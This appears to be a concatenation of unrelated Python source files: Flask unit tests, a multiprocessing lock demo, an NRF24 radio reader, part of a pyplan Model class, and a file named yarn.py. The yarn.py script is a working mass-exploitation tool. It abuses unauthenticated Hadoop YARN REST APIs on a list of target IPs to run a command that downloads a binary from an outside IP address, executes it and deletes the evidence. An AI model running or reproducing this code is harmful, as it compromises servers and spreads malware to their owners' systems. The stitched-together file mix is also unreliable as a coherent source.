@app.route("/none")
def from_none():
pass
@app.route("/small_tuple")
def from_small_tuple():
return ("Hello",)
@app.route("/large_tuple")
def from_large_tuple():
return "Hello", 234, {"X-Foo": "Bar"}, "???"
@app.route("/bad_type")
def from_bad_type():
return True
@app.route("/bad_wsgi")
def from_bad_wsgi():
return lambda: None
c = app.test_client()
with pytest.raises(TypeError) as e:
c.get("/none")
assert "returned None" in str(e)
with pytest.raises(TypeError) as e:
c.get("/small_tuple")
assert "tuple must have the form" in str(e)
pytest.raises(TypeError, c.get, "/large_tuple")
with pytest.raises(TypeError) as e:
c.get("/bad_type")
assert "it was a bool" in str(e)
pytest.raises(TypeError, c.get, "/bad_wsgi")
def test_make_response(app, req_ctx):
rv = flask.make_response()
assert rv.status_code == 200
assert rv.data == b""
assert rv.mimetype == "text/html"
rv = flask.make_response("Awesome")
assert rv.status_code == 200
assert rv.data == b"Awesome"
assert rv.mimetype == "text/html"
rv = flask.make_response("W00t", 404)
assert rv.status_code == 404
assert rv.data == b"W00t"
assert rv.mimetype == "text/html"
def test_make_response_with_response_instance(app, req_ctx):
rv = flask.make_response(flask.jsonify({"msg": "W00t"}), 400)
assert rv.status_code == 400
assert rv.data == b'{"msg":"W00t"}\n'
assert rv.mimetype == "application/json"
rv = flask.make_response(flask.Response(""), 400)
assert rv.status_code == 400
assert rv.data == b""
assert rv.mimetype == "text/html"
rv = flask.make_response(
flask.Response("", headers={"Content-Type": "text/html"}),
400,
[("X-Foo", "bar")],
)
assert rv.status_code == 400
assert rv.headers["Content-Type"] == "text/html"
assert rv.headers["X-Foo"] == "bar"
def test_jsonify_no_prettyprint(app, req_ctx):
app.config.update({"JSONIFY_PRETTYPRINT_REGULAR": False})
compressed_msg = b'{"msg":{"submsg":"W00t"},"msg2":"foobar"}\n'
uncompressed_msg = {"msg": {"submsg": "W00t"}, "msg2": "foobar"}
rv = flask.make_response(flask.jsonify(uncompressed_msg), 200)
assert rv.data == compressed_msg
def test_jsonify_prettyprint(app, req_ctx):
app.config.update({"JSONIFY_PRETTYPRINT_REGULAR": True})
compressed_msg = {"msg": {"submsg": "W00t"}, "msg2": "foobar"}
pretty_response = (
b'{\n "msg": {\n "submsg": "W00t"\n }, \n "msg2": "foobar"\n}\n'
)
rv = flask.make_response(flask.jsonify(compressed_msg), 200)
assert rv.data == pretty_response
def test_jsonify_mimetype(app, req_ctx):
app.config.update({"JSONIFY_MIMETYPE": "application/vnd.api+json"})
msg = {"msg": {"submsg": "W00t"}}
rv = flask.make_response(flask.jsonify(msg), 200)
assert rv.mimetype == "application/vnd.api+json"
def test_jsonify_args_and_kwargs_check(app, req_ctx):
with pytest.raises(TypeError) as e:
flask.jsonify("fake args", kwargs="fake")
assert "behavior undefined" in str(e.value)
def test_url_generation(app, req_ctx):
@app.route("/hello/<name>", methods=["POST"])
def hello():
pass
assert flask.url_for("hello", name="test x") == "/hello/test%20x"
assert (
flask.url_for("hello", name="test x", _external=True)
== "http://localhost/hello/test%20x"
)
def test_build_error_handler(app):
# Test base case, a URL which results in a BuildError.
with app.test_request_context():
pytest.raises(BuildError, flask.url_for, "spam")
# Verify the error is re-raised if not the current exception.
try:
with app.test_request_context():
flask.url_for("spam")
except BuildError as err:
error = err
try:
raise RuntimeError("Test case where BuildError is not current.")
except RuntimeError:
pytest.raises(BuildError, app.handle_url_build_error, error, "spam", {})
# Test a custom handler.
def handler(error, endpoint, values):
# Just a test.
return "/test_handler/"
app.url_build_error_handlers.append(handler)
with app.test_request_context():
assert flask.url_for("spam") == "/test_handler/"
def test_build_error_handler_reraise(app):
# Test a custom handler which reraises the BuildError
def handler_raises_build_error(error, endpoint, values):
raise error
app.url_build_error_handlers.append(handler_raises_build_error)
with app.test_request_context():
pytest.raises(BuildError, flask.url_for, "not.existing")
def test_url_for_passes_special_values_to_build_error_handler(app):
@app.url_build_error_handlers.append
def handler(error, endpoint, values):
assert values == {
"_external": False,
"_anchor": None,
"_method": None,
"_scheme": None,
}
return "handled"
with app.test_request_context():
flask.url_for("/")
def test_custom_converters(app, client):
from werkzeug.routing import BaseConverter
class ListConverter(BaseConverter):
def to_python(self, value):
return value.split(",")
def to_url(self, value):
base_to_url = super(ListConverter, self).to_url
return ",".join(base_to_url(x) for x in value)
app.url_map.converters["list"] = ListConverter
@app.route("/<list:args>")
def index(args):
return "|".join(args)
assert client.get("/1,2,3").data == b"1|2|3"
def test_static_files(app, client):
rv = client.get("/static/index.html")
assert rv.status_code == 200
assert rv.data.strip() == b"<h1>Hello World!</h1>"
with app.test_request_context():
assert flask.url_for("static", filename="index.html") == "/static/index.html"
rv.close()
def test_static_url_path():
app = flask.Flask(__name__, static_url_path="/foo")
app.testing = True
rv = app.test_client().get("/foo/index.html")
assert rv.status_code == 200
rv.close()
with app.test_request_context():
assert flask.url_for("static", filename="index.html") == "/foo/index.html"
def test_static_route_with_host_matching():
app = flask.Flask(__name__, host_matching=True, static_host="example.com")
c = app.test_client()
rv = c.get("http://example.com/static/index.html")
assert rv.status_code == 200
rv.close()
with app.test_request_context():
rv = flask.url_for("static", filename="index.html", _external=True)
assert rv == "http://example.com/static/index.html"
# Providing static_host without host_matching=True should error.
with pytest.raises(Exception):
flask.Flask(__name__, static_host="example.com")
# Providing host_matching=True with static_folder but without static_host should error.
with pytest.raises(Exception):
flask.Flask(__name__, host_matching=True)
# Providing host_matching=True without static_host but with static_folder=None should not error.
flask.Flask(__name__, host_matching=True, static_folder=None)
def test_request_locals():
assert repr(flask.g) == "<LocalProxy unbound>"
assert not flask.g
def test_test_app_proper_environ():
app = flask.Flask(__name__, subdomain_matching=True)
app.config.update(SERVER_NAME="localhost.localdomain:5000")
client = app.test_client()
@app.route("/")
def index():
return "Foo"
@app.route("/", subdomain="foo")
def subdomain():
return "Foo SubDomain"
rv = client.get("/")
assert rv.data == b"Foo"
rv = client.get("/", "http://localhost.localdomain:5000")
assert rv.data == b"Foo"
rv = client.get("/", "https://localhost.localdomain:5000")
assert rv.data == b"Foo"
app.config.update(SERVER_NAME="localhost.localdomain")
rv = client.get("/", "https://localhost.localdomain")
assert rv.data == b"Foo"
try:
app.config.update(SERVER_NAME="localhost.localdomain:443")
rv = client.get("/", "https://localhost.localdomain")
# Werkzeug 0.8
assert rv.status_code == 404
except ValueError as e:
# Werkzeug 0.7
assert str(e) == (
"the server name provided "
"('localhost.localdomain:443') does not match the "
"server name from the WSGI environment ('localhost.localdomain')"
)
try:
app.config.update(SERVER_NAME="localhost.localdomain")
rv = client.get("/", "http://foo.localhost")
# Werkzeug 0.8
assert rv.status_code == 404
except ValueError as e:
# Werkzeug 0.7
assert str(e) == (
"the server name provided "
"('localhost.localdomain') does not match the "
"server name from the WSGI environment ('foo.localhost')"
)
rv = client.get("/", "http://foo.localhost.localdomain")
assert rv.data == b"Foo SubDomain"
def test_exception_propagation(app, client):
def apprunner(config_key):
@app.route("/")
def index():
1 // 0
if config_key is not None:
app.config[config_key] = True
with pytest.raises(Exception):
client.get("/")
else:
assert client.get("/").status_code == 500
# we have to run this test in an isolated thread because if the
# debug flag is set to true and an exception happens the context is
# not torn down. This causes other tests that run after this fail
# when they expect no exception on the stack.
for config_key in "TESTING", "PROPAGATE_EXCEPTIONS", "DEBUG", None:
t = Thread(target=apprunner, args=(config_key,))
t.start()
t.join()
@pytest.mark.parametrize("debug", [True, False])
@pytest.mark.parametrize("use_debugger", [True, False])
@pytest.mark.parametrize("use_reloader", [True, False])
@pytest.mark.parametrize("propagate_exceptions", [None, True, False])
def test_werkzeug_passthrough_errors(
monkeypatch, debug, use_debugger, use_reloader, propagate_exceptions, app
):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(*args, **kwargs):
rv["passthrough_errors"] = kwargs.get("passthrough_errors")
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
app.config["PROPAGATE_EXCEPTIONS"] = propagate_exceptions
app.run(debug=debug, use_debugger=use_debugger, use_reloader=use_reloader)
def test_max_content_length(app, client):
app.config["MAX_CONTENT_LENGTH"] = 64
@app.before_request
def always_first():
flask.request.form["myfile"]
assert False
@app.route("/accept", methods=["POST"])
def accept_file():
flask.request.form["myfile"]
assert False
@app.errorhandler(413)
def catcher(error):
return "42"
rv = client.post("/accept", data={"myfile": "foo" * 100})
assert rv.data == b"42"
def test_url_processors(app, client):
@app.url_defaults
def add_language_code(endpoint, values):
if flask.g.lang_code is not None and app.url_map.is_endpoint_expecting(
endpoint, "lang_code"
):
values.setdefault("lang_code", flask.g.lang_code)
@app.url_value_preprocessor
def pull_lang_code(endpoint, values):
flask.g.lang_code = values.pop("lang_code", None)
@app.route("/<lang_code>/")
def index():
return flask.url_for("about")
@app.route("/<lang_code>/about")
def about():
return flask.url_for("something_else")
@app.route("/foo")
def something_else():
return flask.url_for("about", lang_code="en")
assert client.get("/de/").data == b"/de/about"
assert client.get("/de/about").data == b"/foo"
assert client.get("/foo").data == b"/en/about"
def test_inject_blueprint_url_defaults(app):
bp = flask.Blueprint("foo.bar.baz", __name__, template_folder="template")
@bp.url_defaults
def bp_defaults(endpoint, values):
values["page"] = "login"
@bp.route("/<page>")
def view(page):
pass
app.register_blueprint(bp)
values = dict()
app.inject_url_defaults("foo.bar.baz.view", values)
expected = dict(page="login")
assert values == expected
with app.test_request_context("/somepage"):
url = flask.url_for("foo.bar.baz.view")
expected = "/login"
assert url == expected
def test_nonascii_pathinfo(app, client):
@app.route(u"/киртест")
def index():
return "Hello World!"
rv = client.get(u"/киртест")
assert rv.data == b"Hello World!"
def test_debug_mode_complains_after_first_request(app, client):
app.debug = True
@app.route("/")
def index():
return "Awesome"
assert not app.got_first_request
assert client.get("/").data == b"Awesome"
with pytest.raises(AssertionError) as e:
@app.route("/foo")
def broken():
return "Meh"
assert "A setup function was called" in str(e)
app.debug = False
@app.route("/foo")
def working():
return "Meh"
assert client.get("/foo").data == b"Meh"
assert app.got_first_request
def test_before_first_request_functions(app, client):
got = []
@app.before_first_request
def foo():
got.append(42)
client.get("/")
assert got == [42]
client.get("/")
assert got == [42]
assert app.got_first_request
def test_before_first_request_functions_concurrent(app, client):
got = []
@app.before_first_request
def foo():
time.sleep(0.2)
got.append(42)
def get_and_assert():
client.get("/")
assert got == [42]
t = Thread(target=get_and_assert)
t.start()
get_and_assert()
t.join()
assert app.got_first_request
def test_routing_redirect_debugging(app, client):
app.debug = True
@app.route("/foo/", methods=["GET", "POST"])
def foo():
return "success"
with client:
with pytest.raises(AssertionError) as e:
client.post("/foo", data={})
assert "http://localhost/foo/" in str(e)
assert ("Make sure to directly send " "your POST-request to this URL") in str(e)
rv = client.get("/foo", data={}, follow_redirects=True)
assert rv.data == b"success"
app.debug = False
with client:
rv = client.post("/foo", data={}, follow_redirects=True)
assert rv.data == b"success"
def test_route_decorator_custom_endpoint(app, client):
app.debug = True
@app.route("/foo/")
def foo():
return flask.request.endpoint
@app.route("/bar/", endpoint="bar")
def for_bar():
return flask.request.endpoint
@app.route("/bar/123", endpoint="123")
def for_bar_foo():
return flask.request.endpoint
with app.test_request_context():
assert flask.url_for("foo") == "/foo/"
assert flask.url_for("bar") == "/bar/"
assert flask.url_for("123") == "/bar/123"
assert client.get("/foo/").data == b"foo"
assert client.get("/bar/").data == b"bar"
assert client.get("/bar/123").data == b"123"
def test_preserve_only_once(app, client):
app.debug = True
@app.route("/fail")
def fail_func():
1 // 0
for x in range(3):
with pytest.raises(ZeroDivisionError):
client.get("/fail")
assert flask._request_ctx_stack.top is not None
assert flask._app_ctx_stack.top is not None
# implicit appctx disappears too
flask._request_ctx_stack.top.pop()
assert flask._request_ctx_stack.top is None
assert flask._app_ctx_stack.top is None
def test_preserve_remembers_exception(app, client):
app.debug = True
errors = []
@app.route("/fail")
def fail_func():
1 // 0
@app.route("/success")
def success_func():
return "Okay"
@app.teardown_request
def teardown_handler(exc):
errors.append(exc)
# After this failure we did not yet call the teardown handler
with pytest.raises(ZeroDivisionError):
client.get("/fail")
assert errors == []
# But this request triggers it, and it's an error
client.get("/success")
assert len(errors) == 2
assert isinstance(errors[0], ZeroDivisionError)
# At this point another request does nothing.
client.get("/success")
assert len(errors) == 3
assert errors[1] is None
def test_get_method_on_g(app_ctx):
assert flask.g.get("x") is None
assert flask.g.get("x", 11) == 11
flask.g.x = 42
assert flask.g.get("x") == 42
assert flask.g.x == 42
def test_g_iteration_protocol(app_ctx):
flask.g.foo = 23
flask.g.bar = 42
assert "foo" in flask.g
assert "foos" not in flask.g
assert sorted(flask.g) == ["bar", "foo"]
def test_subdomain_basic_support():
app = flask.Flask(__name__, subdomain_matching=True)
app.config["SERVER_NAME"] = "localhost.localdomain"
client = app.test_client()
@app.route("/")
def normal_index():
return "normal index"
@app.route("/", subdomain="test")
def test_index():
return "test index"
rv = client.get("/", "http://localhost.localdomain/")
assert rv.data == b"normal index"
rv = client.get("/", "http://test.localhost.localdomain/")
assert rv.data == b"test index"
def test_subdomain_matching():
app = flask.Flask(__name__, subdomain_matching=True)
client = app.test_client()
app.config["SERVER_NAME"] = "localhost.localdomain"
@app.route("/", subdomain="<user>")
def index(user):
return "index for %s" % user
rv = client.get("/", "http://mitsuhiko.localhost.localdomain/")
assert rv.data == b"index for mitsuhiko"
def test_subdomain_matching_with_ports():
app = flask.Flask(__name__, subdomain_matching=True)
app.config["SERVER_NAME"] = "localhost.localdomain:3000"
client = app.test_client()
@app.route("/", subdomain="<user>")
def index(user):
return "index for %s" % user
rv = client.get("/", "http://mitsuhiko.localhost.localdomain:3000/")
assert rv.data == b"index for mitsuhiko"
@pytest.mark.parametrize("matching", (False, True))
def test_subdomain_matching_other_name(matching):
app = flask.Flask(__name__, subdomain_matching=matching)
app.config["SERVER_NAME"] = "localhost.localdomain:3000"
client = app.test_client()
@app.route("/")
def index():
return "", 204
# ip address can't match name
rv = client.get("/", "http://127.0.0.1:3000/")
assert rv.status_code == 404 if matching else 204
# allow all subdomains if matching is disabled
rv = client.get("/", "http://www.localhost.localdomain:3000/")
assert rv.status_code == 404 if matching else 204
def test_multi_route_rules(app, client):
@app.route("/")
@app.route("/<test>/")
def index(test="a"):
return test
rv = client.open("/")
assert rv.data == b"a"
rv = client.open("/b/")
assert rv.data == b"b"
def test_multi_route_class_views(app, client):
class View(object):
def __init__(self, app):
app.add_url_rule("/", "index", self.index)
app.add_url_rule("/<test>/", "index", self.index)
def index(self, test="a"):
return test
_ = View(app)
rv = client.open("/")
assert rv.data == b"a"
rv = client.open("/b/")
assert rv.data == b"b"
def test_run_defaults(monkeypatch, app):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(*args, **kwargs):
rv["result"] = "running..."
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
app.run()
assert rv["result"] == "running..."
def test_run_server_port(monkeypatch, app):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(hostname, port, application, *args, **kwargs):
rv["result"] = "running on %s:%s ..." % (hostname, port)
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
hostname, port = "localhost", 8000
app.run(hostname, port, debug=True)
assert rv["result"] == "running on %s:%s ..." % (hostname, port)
@pytest.mark.parametrize(
"host,port,expect_host,expect_port",
(
(None, None, "pocoo.org", 8080),
("localhost", None, "localhost", 8080),
(None, 80, "pocoo.org", 80),
("localhost", 80, "localhost", 80),
),
)
def test_run_from_config(monkeypatch, host, port, expect_host, expect_port, app):
def run_simple_mock(hostname, port, *args, **kwargs):
assert hostname == expect_host
assert port == expect_port
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
app.config["SERVER_NAME"] = "pocoo.org:8080"
app.run(host, port)
def test_max_cookie_size(app, client, recwarn):
app.config["MAX_COOKIE_SIZE"] = 100
# outside app context, default to Werkzeug static value,
# which is also the default config
response = flask.Response()
default = flask.Flask.default_config["MAX_COOKIE_SIZE"]
assert response.max_cookie_size == default
# inside app context, use app config
with app.app_context():
assert flask.Response().max_cookie_size == 100
@app.route("/")
def index():
r = flask.Response("", status=204)
r.set_cookie("foo", "bar" * 100)
return r
client.get("/")
assert len(recwarn) == 1
w = recwarn.pop()
assert "cookie is too large" in str(w.message)
app.config["MAX_COOKIE_SIZE"] = 0
client.get("/")
assert len(recwarn) == 0
|
mutex_and_join1.py | # 执行前修改db.txt中count数量
from multiprocessing import Process, Lock
import json
import time
def search(name):
time.sleep(1)
with open('db.txt', 'r', encoding='utf-8') as f:
dic = json.load(f)
print('<%s> find tickets [%s]' % (name, dic['count']))
def get(name):
time.sleep(1)
dic = json.load(open('db.txt', 'r', encoding='utf-8'))
if dic['count'] > 0:
dic['count'] -= 1
time.sleep(3)
json.dump(dic, open('db.txt', 'w', encoding='utf-8'))
print('<%s> success!' % name)
else:
print('fail')
def task(name, mutex):
search(name)
mutex.acquire()
get(name)
mutex.release()
if __name__ == "__main__":
mutex = Lock()
for i in range(5):
p = Process(target=task, args=('user%s' % i, mutex))
p.start()
|
NRFReader.py | from nrf24 import NRF24
from threading import Thread
from struct import *
uuid = 0xCB15CA;
class NRFReader:
def __init__(self):
self.radio = NRF24()
self.radio.begin(1, 0, "P8_23", "P8_24")
self.radio.setRetries(3, 5)
self.radio.setPayloadSize(32)
self.radio.setChannel(0x60)
self.radio.setDataRate(NRF24.BR_250KBPS)
self.radio.setPALevel(NRF24.PA_MAX)
self.radio.setAutoAck(1)
self.radio.openReadingPipe(1, uuid)
self.radio.startListening()
self.radio.stopListening()
self.radio.printDetails()
def run(self):
radio.startListening()
while True:
import DaloyGround
pipe = [0]
while not radio.available(pipe):
time.sleep(10000/1000000.0)
recv_buffer = []
radio.read(recv_buffer, radio.getDynamicPayloadSize())
packet = unpack("<ffff", recv_buffer)
DaloyGround.instance.registerEntry(packet)
print recv_buffer
def start(self):
thread = Thread(target=self.run)
thread.start() |
yarn.py | import sys
import threading
import requests
import os
from Queue import *
from threading import Thread
ips = open(sys.argv[1], "r").readlines()
queue = Queue()
queue_count = 0
cmd = "cd /tmp; wget http://89.42.133.67/x86 chmod 777 *; ./x86 yarn; rm -rf *"
def rtek(host):
try:
url = 'http://' + host + ':8088/ws/v1/cluster/apps/new-application'
resp = requests.post(url, timeout=3)
app_id = resp.json()['application-id']
url = 'http://' + host + ':8088/ws/v1/cluster/apps'
data = {
'application-id': app_id,
'application-name': 'get-shell',
'am-container-spec': {
'commands': {
'command': '%s' % cmd,
},
},
'application-type': 'YARN',
}
requests.post(url, json=data, timeout=3)
print("[YARN] - %s" % host)
except:
pass
return
def main():
global queue_count
for line in ips:
line = line.strip("\r")
line = line.strip("\n")
queue_count += 1
sys.stdout.write("\r[%d] Added to queue" % (queue_count))
sys.stdout.flush()
queue.put(line)
sys.stdout.write("\n")
i = 0
while i != queue_count:
i += 1
try:
input = queue.get()
thread = Thread(target=rtek, args=(input,))
thread.start()
except KeyboardInterrupt:
os.kill(os.getpid(), 9)
thread.join()
return
if __name__ == "__main__":
main()
|
Model.py | import datetime
import importlib
import os
import re
import subprocess
import sys
import threading
import unicodedata
import environ
from shlex import split
from sys import platform
from time import sleep
import jsonpickle
import xarray as xr
from site import getsitepackages
from pyplan_engine.classes.BaseNode import BaseNode
from pyplan_engine.classes.Evaluator import Evaluator
from pyplan_engine.classes.Intellisense import Intellisense
from pyplan_engine.classes.IOModule import IOModule
from pyplan_engine.classes.PyplanFunctions import Selector
from pyplan_engine.classes.wizards import (CalculatedField, SelectColumns, SelectRows, DataframeIndex, DataframeGroupby,sourcecsv)
from pyplan_engine.common.classes.indexValuesReq import IndexValuesReq
class Model(object):
def __init__(self):
self._nodeDic = {}
self._nodeClassDic = dict()
self._modelProp = {}
self._modelNode = None
self._isLoadingModel = False
self.initialize()
self.evaluationVersion = 0
self.inCyclicEvaluate = False
self._scenarioDic = dict()
self._wizard = None
self._currentProcessingNode = ""
self._currentInstallProgress = []
# Props
@property
def nodeDic(self):
return self._nodeDic
@property
def modelProp(self):
return self._modelProp
@property
def modelNode(self):
return self._modelNode
@property
def isLoadingModel(self):
return self._isLoadingModel
# Methods
def getPID(self):
return os.getpid()
def getDefaultNodeFormat(self, nodeClass):
if nodeClass in self._nodeClassDic:
return self._nodeClassDic[nodeClass]
else:
return None
def getTotalMemory(self):
res = 0
for node in self.nodeDic:
res = res+self.nodeDic[node].usedMemory
return res
def getCurrentModelPath(self):
if self.existNode("current_path"):
return self.getNode("current_path").result
return ""
def setCurrentModelPath(self, value):
if self.existNode("current_path"):
self.getNode("current_path").definition = 'result="""' + \
str(value) + '"""'
def currentProcessingNode(self, nodeId):
if nodeId not in ["__evalnode__", "current_path"]:
self._currentProcessingNode = nodeId
def initialize(self, modelName=None):
if modelName is None:
self._modelNode = self.createNode("new_model", "model", "_model_")
else:
newId = modelName.lower()
newId = re.sub('[^0-9a-z]+', '_', newId)
self._modelNode = self.createNode(newId, "model", "_model_")
self._modelNode.title = modelName
self._scenarioDic = dict()
self._nodeClassDic = dict()
self._wizard = None
def createNode(self, identifier=None, nodeClass=None, moduleId=None, x=None, y=None, toObj=False, originalId=None):
"""Create new node"""
newNode = BaseNode(model=self, identifier=identifier, nodeClass=nodeClass,
moduleId=moduleId, x=x, y=y, originalId=originalId)
id = newNode.identifier
self.nodeDic[id] = newNode
newNode = None
if toObj:
return self.nodeDic[id].toObj()
else: # uso interno
return self.nodeDic[id]
def deleteNodes(self, nodes, removeAliasIfNotIn=None):
"""Delete nodes by node id"""
if not nodes is None:
for nodeId in nodes:
if self.existNode(nodeId) and nodeId != "_model_" and nodeId != "imports":
# check for module
if self.getNode(nodeId).nodeClass == "module":
childs = self.findNodes('moduleId', nodeId)
childsIds = [c.identifier for c in childs]
self.deleteNodes(childsIds, removeAliasIfNotIn)
# check for aliases
aliases = []
aliases = self.findNodes('originalId', nodeId)
if aliases:
aliasesId = [a.identifier for a in aliases]
# check for aliases in other modules
if removeAliasIfNotIn:
_auxAliases = []
for _aliasId in aliasesId:
if self.isIn(_aliasId, removeAliasIfNotIn):
_auxAliases.append(_aliasId)
if len(_auxAliases) > 0:
self.deleteNodes(
_auxAliases, removeAliasIfNotIn)
else:
self.deleteNodes(aliasesId, removeAliasIfNotIn)
self.nodeDic[nodeId].ioEngine.updateOnDeleteNode()
self.nodeDic[nodeId].release()
self.nodeDic[nodeId] = None
del self.nodeDic[nodeId]
pass
def existNode(self, nodeId):
"""Return True if node exists in model"""
nodeId = self.clearId(nodeId)
if (not nodeId is None) & (nodeId in self.nodeDic):
return True
return False
def getNode(self, nodeId):
"""Renor node from node dictionary"""
if self.existNode(nodeId):
return self.nodeDic[nodeId]
def isChild(self, nodeId, modulesId):
"""Return true if nodeid or one of your parents is in any of modulesId modules"""
res = False
if self.existNode(nodeId):
aux = self.getNode(nodeId).moduleId
nChance = 20
while (res == False and aux != "_model_" and nChance > 0):
res = aux in modulesId
node = self.getNode(aux)
if node:
aux = node.moduleId
else:
nChance = 0
nChance -= 1
return res
def isNodeInScenario(self, nodeId):
if nodeId in self._scenarioDic:
return True
else:
return False
def evaluateNode(self, nodeId, dims=None, rows=None, columns=None, summaryBy="sum", bottomTotal=False, rightTotal=False, fromRow=0, toRow=0):
"""Evaluate node. Call evaluator class for implement diferent evaluators."""
if self.existNode(nodeId):
result = None
if nodeId in self._scenarioDic:
result = self._scenarioDic[nodeId]
else:
result = self.nodeDic[nodeId].result
if not result is None:
self.evaluationVersion += 1
evaluator = Evaluator.createInstance(result)
return evaluator.evaluateNode(result, self.nodeDic, nodeId, dims, rows, columns, summaryBy, bottomTotal, rightTotal, fromRow, toRow)
else:
return ""
def executeButton(self, nodeId):
"""Execute node of class button"""
if self.existNode(nodeId):
self.nodeDic[nodeId].invalidate()
toReturn = self.nodeDic[nodeId].result
if toReturn is None:
toReturn = ""
return toReturn
else:
return ""
def previewNode(self, nodeId):
"""Perform preview of a node"""
result = None
if self.existNode(nodeId):
if not self.nodeDic[nodeId].originalId is None:
nodeId = self.nodeDic[nodeId].originalId
if not self.nodeDic[nodeId].result is None:
self.evaluationVersion += 1
evaluator = Evaluator.createInstance(
self.nodeDic[nodeId].result)
result = evaluator.previewNode(self.nodeDic, nodeId)
if result is None:
evaluator = Evaluator.createInstance(None)
result = evaluator.generateEmptyPreviewResponse(
self.nodeDic, nodeId)
return result
def getCubeValues(self, query):
"""Evaluate node. Used for pivotgrid"""
nodeId = query["cube"]
if self.existNode(nodeId):
result = None
if nodeId in self._scenarioDic:
result = self._scenarioDic[nodeId]
else:
result = self.nodeDic[nodeId].result
if not result is None:
evaluator = Evaluator.createInstance(result)
return evaluator.getCubeValues(result, self.nodeDic, nodeId, query)
def getCubeDimensionValues(self, query):
"""Return the values of a dimension of node. Used from pivotgrid"""
nodeId = query["cube"]
if self.existNode(nodeId):
result = None
if nodeId in self._scenarioDic:
result = self._scenarioDic[nodeId]
else:
result = self.nodeDic[nodeId].result
if not result is None:
evaluator = Evaluator.createInstance(result)
return evaluator.getCubeDimensionValues(result, self.nodeDic, nodeId, query)
def getCubeMetadata(self, nodeId):
"""Return metadata of cube. Used from pivotgrid"""
if self.existNode(nodeId):
result = None
if nodeId in self._scenarioDic:
result = self._scenarioDic[nodeId]
else:
result = self.nodeDic[nodeId].result
if not result is None:
evaluator = Evaluator.createInstance(result)
return evaluator.getCubeMetadata(result, self.nodeDic, nodeId)
def setNodeValueChanges(self, changes):
"""Set values for node using filters"""
nodeId = changes["node"]
if self.existNode(nodeId):
if self.nodeDic[nodeId].nodeClass == "formnode":
nodeId = self.nodeDic[nodeId].originalId
evaluator = Evaluator.createInstance(None)
return evaluator.setNodeValueChanges(self.nodeDic, nodeId, changes)
else:
if not self.nodeDic[nodeId].originalId is None:
nodeId = self.nodeDic[nodeId].originalId
if not self.nodeDic[nodeId].result is None:
evaluator = Evaluator.createInstance(
self.nodeDic[nodeId].result)
return evaluator.setNodeValueChanges(self.nodeDic, nodeId, changes)
def getDiagram(self, moduleId=None):
"""Get diagram"""
if moduleId is None:
moduleId = self.modelNode.identifier
moduleId = self.clearId(moduleId)
res = {
"moduleId": moduleId,
"arrows": [],
"nodes": [],
"breadcrumb": []
}
nodeList = self.findNodes("moduleId", moduleId)
nodeList.sort(key=lambda x: int(x.z))
for node in nodeList:
res["nodes"].append(node.toObj(
exceptions=["definition"], fillDefaultProperties=True))
res["breadcrumb"] = self.getBreadcrumb(moduleId)
return res
def getBreadcrumb(self, moduleId=None):
"""Get breadcrumb"""
if moduleId is None:
moduleId = self.modelNode.identifier
moduleId = self.clearId(moduleId)
res = []
aux = moduleId
while aux != self.modelNode.identifier and self.existNode(aux):
res.append({
"identifier": aux,
"title": (self.getNode(aux).title or aux)
})
aux = self.getNode(aux).moduleId
res.append({"identifier": self.modelNode.identifier,
"title": self.modelNode.title or "Main"})
return res
def isIn(self, nodeId, moduleId):
""" Return true if nodeId is in moduleId. Search for parents"""
res = False
aux = nodeId
_secure = 1
while aux != self.modelNode.identifier and self.existNode(aux) and _secure < 100:
if aux == moduleId:
res = True
break
aux = self.getNode(aux).moduleId
_secure += 1
return res
def isSelector(self, nodeId):
"""Return True if nodeId is of type Selector"""
if self.existNode(nodeId):
return isinstance(self.getNode(nodeId).result, Selector)
return False
def getSelector(self, nodeId):
"""Return selector data if node is of type selector"""
if self.isSelector(nodeId):
return self.getNode(nodeId).result.toObj()
def release(self):
"""Release model. Free all resources """
if not self._modelNode is None:
self._modelNode.release()
(xx.release() for xx in self.nodeDic)
keys = [x for x in self.nodeDic]
for key in keys:
del self.nodeDic[key]
self._nodeDic = {}
self._modelProp = {}
self._modelNode = None
self._scenarioDic = dict()
self._nodeClassDic = dict()
self._wizard = None
return
def getNextIdentifier(self, prefix):
"""Get next free identifier of node"""
reg = r"(\d+$)"
matches = re.findall(reg, prefix)
start_at = 1
if len(matches) > 0:
num = matches[0]
start_at = int(num)+1
if start_at>100000000:
prefix += "_"
start_at=1
else:
prefix = prefix[: -len(num)]
for num in range(start_at, 100000000):
key = prefix+str(num)
if not key in self.nodeDic:
return key
def clearId(self, nodeId):
"""DEPRECATED"""
# if not nodeId is None:
# return nodeId.lower()
return nodeId
def updateNodeIdInDic(self, oldNodeId, newNodeId):
"""Update node identifier on all dictionary."""
if self.existNode(oldNodeId):
newNodeId = self.clearId(newNodeId)
self.nodeDic[newNodeId] = self.nodeDic[oldNodeId]
for node in self.findNodes("moduleId", oldNodeId):
node.moduleId = newNodeId
for node in self.findNodes("originalId", oldNodeId):
node.originalId = newNodeId
node._definition = "result = " + str(newNodeId)
del self.nodeDic[oldNodeId]
return True
else:
return False
def setNodeProperties(self, nodeId, properties):
"""Update properties of a node"""
nodeId = self.clearId(nodeId)
if self.existNode(nodeId):
_node = self.getNode(nodeId)
for prop in properties:
if "." in prop["name"]:
nodeProp, objProp = prop["name"].split(".")
setattr(getattr(_node, nodeProp), objProp, prop["value"])
else:
setattr(_node, prop["name"], prop["value"])
def getNodeProperties(self, nodeProperties):
"""Get properties of a node"""
if (not nodeProperties is None) and (nodeProperties["node"] != ""):
nodeId = self.clearId(nodeProperties["node"])
if self.existNode(nodeId):
_node = self.getNode(nodeId)
for prop in nodeProperties["properties"]:
if hasattr(_node, prop["name"]):
prop["value"] = getattr(_node, prop["name"])
return nodeProperties
pass
def setModelProperties(self, properties):
"""Update properties of model"""
for key in properties:
if key == 'modelId':
continue
elif key in ['identifier', 'title']:
setattr(self.modelNode, key, properties[key])
else:
self.modelProp[key] = properties[key]
def getModelProperties(self):
"""Get model propierties"""
res = dict()
# fill model id and tile
res["identifier"] = self.modelNode.identifier
res["title"] = self.modelNode.title
for key in self.modelProp:
res[key] = self.modelProp[key]
return res
def getIndexes(self, nodeId):
"""Return indexes of a node"""
if self.existNode(nodeId):
if nodeId in self._scenarioDic:
